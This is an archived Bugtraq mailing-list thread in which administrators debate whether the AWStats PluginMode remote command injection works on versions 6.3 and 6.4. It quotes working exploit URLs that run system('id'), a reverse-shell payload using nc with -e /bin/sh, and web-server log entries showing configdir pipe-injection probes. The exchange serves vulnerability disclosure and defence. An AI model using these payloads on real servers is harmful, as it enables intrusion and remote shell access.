Bekijk Volledige Versie : RE: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
William Pratt
16/02/05, 02:35
Same thing here on both 6.3 and 6.4. I am unable to reproduce this.
Error: Can't locate object method "BuildFullHTMLOutput_print" via =
package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) =
line 1.
Setup =
('/usr/local/apache/root/billpratt_net/cgi-bin/awstats/awstats.conf' =
file, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' =
directory).
William Pratt
Sr. Engineering Application Developer
Megapath Networks, Inc.
Http://www.MegaPath.net
I wish there was a knob on the TV to turn up the intelligence. There's =
a knob called "brightness", but it doesn't seem to work.
=20
-- Gallagher=20
-----Original Message-----
From: Jamie Pratt [mailto:jpratt@norwich.edu]
Sent: Tuesday, February 15, 2005 11:26 AM
To: Ondra Holecek
Cc: bugtraq@securityfocus.com
Subject: Re: AWStats <=3D 6.4 Multiple vulnerabilities - can't reproduce
in 6.3?
So what are the conditions of this bug/vuln? I can't reproduce this on=20
several 6.3 installs..:
awstats 6.3 from source:
request:
http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=3D:print+syste=
m('id')+;
output:
****************
Error: Can't locate object method "BuildFullHTMLOutput_print" via=20
package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1)=20
line 1.
Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or=20
permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs'=20
directory).
***************
regards,
jamie
Ondra Holecek wrote:
>=20
>=20
> GHC@www.securityfocus.com wrote:
> |
> | =
/*=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= 3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=3D*/
> | // GHC -> AWStats <- ADVISORY
> | \\ PRODUCT: AWStats
> | // VERSION: <=3D 6.3
> | \\ URL: http://awstats.sourceforge.net/
> | // VULNERABILITY CLASS: Multiple vulnerabilities
> | \\ RISK: high
> | =
/*=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= 3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3 D=3D*/
>=20
> [...]
>=20
> |
> | PluginMode=3D:print+getpwent
> |
> | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
> | This will satisfy eval() requirements., and :print getpwent() is=20
> executed.
> |
> |
> =
http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=3D:print=
+getpwent=20
>=20
> |
> | Sanitazing limits user's input, but there is no filtration for call
> sympols '()'.
>=20
> no, user is not limited, he can execute ANY command if he add ; at the
> end of the command, try this
>=20
> awstats.pl?&PluginMode=3D:print+system('id')+;
>=20
> or even this
>=20
> =
awstats.pl?&PluginMode=3D:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;=
>=20
>=20
> Ondra
--=20
James Pratt
Unix Systems Administrator
Norwich University
http://www.norwich.edu/it
<jpratt@norwich.edu> | ph. (802)485-2532
twebster@daksoft.com
16/02/05, 05:15
You may need to specify an awstats config to view
example:
http://www.site.org/awstats/cgi-bin/awstats.pl?config=websitename&PluginMode=:print+system('id')+
;
Tony
Jamie Pratt <jpratt@norwich.edu> wrote on 02/15/2005 12:25:43 PM:
> So what are the conditions of this bug/vuln? I can't reproduce this on
> several 6.3 installs..:
>
> awstats 6.3 from source:
>
> request:
>
> http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:
> print+system('id')+;
>
> output:
> ****************
> Error: Can't locate object method "BuildFullHTMLOutput_print" via
> package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1)
> line 1.
>
> Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or
> permissions) may be wrong.
> Check config file, permissions and AWStats documentation (in 'docs'
> directory).
> ***************
>
> regards,
> jamie
>
> Ondra Holecek wrote:
> >
> >
> > GHC@www.securityfocus.com wrote:
> > |
> > | /*==========================================*/
> > | // GHC -> AWStats <- ADVISORY
> > | \\ PRODUCT: AWStats
> > | // VERSION: <= 6.3
> > | \\ URL: http://awstats.sourceforge.net/
> > | // VULNERABILITY CLASS: Multiple vulnerabilities
> > | \\ RISK: high
> > | /*==========================================*/
> >
> > [...]
> >
> > |
> > | PluginMode=:print+getpwent
> > |
> > | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
> > | This will satisfy eval() requirements., and :print getpwent() is
> > executed.
> > |
> > |
> > http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:
> print+getpwent
> >
> > |
> > | Sanitazing limits user's input, but there is no filtration for call
> > sympols '()'.
> >
> > no, user is not limited, he can execute ANY command if he add ; at the
> > end of the command, try this
> >
> > awstats.pl?&PluginMode=:print+system('id')+;
> >
> > or even this
> >
> > awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
> >
> >
> > Ondra
>
> --
>
> James Pratt
> Unix Systems Administrator
> Norwich University
> http://www.norwich.edu/it
> <jpratt@norwich.edu> | ph. (802)485-2532
K-OTiK Security
16/02/05, 20:55
In-Reply-To: <42126DAD.7090704@norwich.edu>
6.4 was released on 2005-02-14 13:13
Fixes:
- Fix security hole that allowed a user to read log file content even
when plugin rawlog was not enabled.
- Fix a possible use of AWStats for a DoS attack.
- configdir option was broken on windows servers.
- Minor fixes
Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com/english
>Still no dice on 6.3, even with the "config=www.site.org" etc,etc.. same
>error. So.. Can we all agree that 6.3 is not vulnerable, because I'd
>rather not upgrade to a dev/unstable release for no reason...
>
>regards,
>jamie
Micah Brandon
17/02/05, 01:15
I'm going to have to disagree. Execution of Perl functions
is still possible in 6.3. You just have to jimmy it a little and
try/guess different plugins that may be installed. I got a hit
with 'hostinfo'. Try this on your server:
http://server/cgi-bin/awstats.pl?config=someconfig&PluginMode=hostinfo+time
Unix time shows up just below 'Whois command failed' error message.
That's game over in my book.
* Jamie Pratt (jpratt@norwich.edu) [050216 01:19]:
> Still no dice on 6.3, even with the "config=www.site.org" etc,etc.. same
> error. So.. Can we all agree that 6.3 is not vulnerable, because I'd
> rather not upgrade to a dev/unstable release for no reason...
>
> regards,
> jamie
>
> Herman Sheremetyev wrote:
> >It works on mine too, though I still have 6.1. I think you may need to
> >add the config=www.example.com into the url between the '?' and the '&'
> >for it to work properly though. On my linux boxes with apache 2.0 it
> >displays the command output in the page but on openbsd with apache 1.3
> >it gives a 500 Server Error because the output ends up in the headers
> >somehow. Either way it works though.
> >
> >-Herman
> >
Michael Scheidell
17/02/05, 23:45
And the skiddies who tried to exploit something that didn't exist on our
site:
(this goes on for some time, here is just a snipp)
So, anyone out there who decided to do a 'wait and see', don't.
Disable awstats, use access rules, upgrade it or all three.
217.172.168.109 - - [03/Feb/2005:12:28:28 -0500] "GET
//cgi-bin/awstats/awstats.
pl?configdir=3D|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 =
(compatible;
MSIE 6.
0; Windows 98)"
217.172.168.109 - - [03/Feb/2005:12:28:29 -0500] "GET
//cgi-bin/awstats.pl?confi
gdir=3D|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windo
ws 98)"
64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET
//cgi-bin/awstats/awstats.pl?
configdir=3D|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible;
MSIE 6.0;
Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET
//cgi-bin/awstats.pl?configdi
r=3D|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE =
6.0;
Windows
98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET
//cgi/awstats.pl?configdir=3D|%
20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET
//awstatswwwroot/cgi-bin/awst
ats.pl?configdir=3D|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0
(compatible; MSI
E 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET
//cgi/awstats.pl?configdir=3D|%
20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET
//cgi-bin/cgi-bin/awstats.pl?
configdir=3D|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible;
MSIE 6.0;
Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/
cgi-bin/awstats.pl
Matt Wilder
18/02/05, 00:35
Awstats version 5.6 is not succeptable to this as it does not have the
same plugin architecture. Could this be a >= 6.0 bug?
Matt
On Wed, 16 Feb 2005 15:52:00 -0500, Micah Brandon <brandon@vv.com> wrote:
>
>
> I'm going to have to disagree. Execution of Perl functions
> is still possible in 6.3. You just have to jimmy it a little and
> try/guess different plugins that may be installed. I got a hit
> with 'hostinfo'. Try this on your server:
>
> http://server/cgi-bin/awstats.pl?config=someconfig&PluginMode=hostinfo+time
>
> Unix time shows up just below 'Whois command failed' error message.
> That's game over in my book.
>
> * Jamie Pratt (jpratt@norwich.edu) [050216 01:19]:
> > Still no dice on 6.3, even with the "config=www.site.org" etc,etc.. same
> > error. So.. Can we all agree that 6.3 is not vulnerable, because I'd
> > rather not upgrade to a dev/unstable release for no reason...
> >
> > regards,
> > jamie
> >
> > Herman Sheremetyev wrote:
> > >It works on mine too, though I still have 6.1. I think you may need to
> > >add the config=www.example.com into the url between the '?' and the '&'
> > >for it to work properly though. On my linux boxes with apache 2.0 it
> > >displays the command output in the page but on openbsd with apache 1.3
> > >it gives a 500 Server Error because the output ends up in the headers
> > >somehow. Either way it works though.
> > >
> > >-Herman
> > >
>
>
newbug Tseng
19/02/05, 08:45
In-Reply-To: <eb743f98050217110164a4bcc8@mail.gmail.com>
Hi.
Please check http://packetstormsecurity.org/0501-exploits/AWStatsVulnAnalysis.pdf
there're some code analysis for awstats.
>Received: (qmail 27381 invoked from network); 17 Feb 2005 23:09:56 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
> by mail.securityfocus.com with SMTP; 17 Feb 2005 23:09:56 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
> by outgoing3.securityfocus.com (Postfix) with QMQP
> id 8FF59236F8F; Thu, 17 Feb 2005 14:10:30 -0700 (MST)
>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@securityfocus.com>
>List-Help: <mailto:bugtraq-help@securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Received: (qmail 3997 invoked from network); 17 Feb 2005 11:45:31 -0000
>DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
> s=beta; d=gmail.com;
> h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:references;
> b=nLCVZEk7LKjqoO+d2+fntjdStVXrCNZSVMNIK29CyEKVCJQ8 dByUnvyXq3O0QoIddiOfBowLVRkJFm2CbLDG8igDnYmML2np8h gCiZfim+BvgyZIWH8/yCSNTvbAs/VR60cslwdHHbGG5qP1pDNMbvX3iPGJ7yGp/ZQ0x5pxQbM=
>Message-ID: <eb743f98050217110164a4bcc8@mail.gmail.com>
>Date: Thu, 17 Feb 2005 14:01:33 -0500
>From: Matt Wilder <grewaru@gmail.com>
>Reply-To: Matt Wilder <grewaru@gmail.com>
>To: bugtraq@securityfocus.com
>Subject: Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
>In-Reply-To: <20050216205200.GA19342@scooby.netsville.com>
>Mime-Version: 1.0
>Content-Type: text/plain; charset=US-ASCII
>Content-Transfer-Encoding: 7bit
>References: <20050214081040.3370.qmail@www.securityfocus.com>
> <42121439.6020505@deprese.net> <42124CB7.4020909@norwich.edu>
> <421252E8.8070200@deprese.net> <42126BBB.90606@swebpage.com>
> <42126DAD.7090704@norwich.edu>
> <20050216205200.GA19342@scooby.netsville.com>
>
>Awstats version 5.6 is not succeptable to this as it does not have the
>same plugin architecture. Could this be a >= 6.0 bug?
>
>Matt
>
>
>On Wed, 16 Feb 2005 15:52:00 -0500, Micah Brandon <brandon@vv.com> wrote:
>>
>>
>> I'm going to have to disagree. Execution of Perl functions
>> is still possible in 6.3. You just have to jimmy it a little and
>> try/guess different plugins that may be installed. I got a hit
>> with 'hostinfo'. Try this on your server:
>>
>> http://server/cgi-bin/awstats.pl?config=someconfig&PluginMode=hostinfo+time
>>
>> Unix time shows up just below 'Whois command failed' error message.
>> That's game over in my book.
>>
>> * Jamie Pratt (jpratt@norwich.edu) [050216 01:19]:
>> > Still no dice on 6.3, even with the "config=www.site.org" etc,etc.. same
>> > error. So.. Can we all agree that 6.3 is not vulnerable, because I'd
>> > rather not upgrade to a dev/unstable release for no reason...
>> >
>> > regards,
>> > jamie
>> >
>> > Herman Sheremetyev wrote:
>> > >It works on mine too, though I still have 6.1. I think you may need to
>> > >add the config=www.example.com into the url between the '?' and the '&'
>> > >for it to work properly though. On my linux boxes with apache 2.0 it
>> > >displays the command output in the page but on openbsd with apache 1.3
>> > >it gives a 500 Server Error because the output ends up in the headers
>> > >somehow. Either way it works though.
>> > >
>> > >-Herman
>> > >
>>
>>
>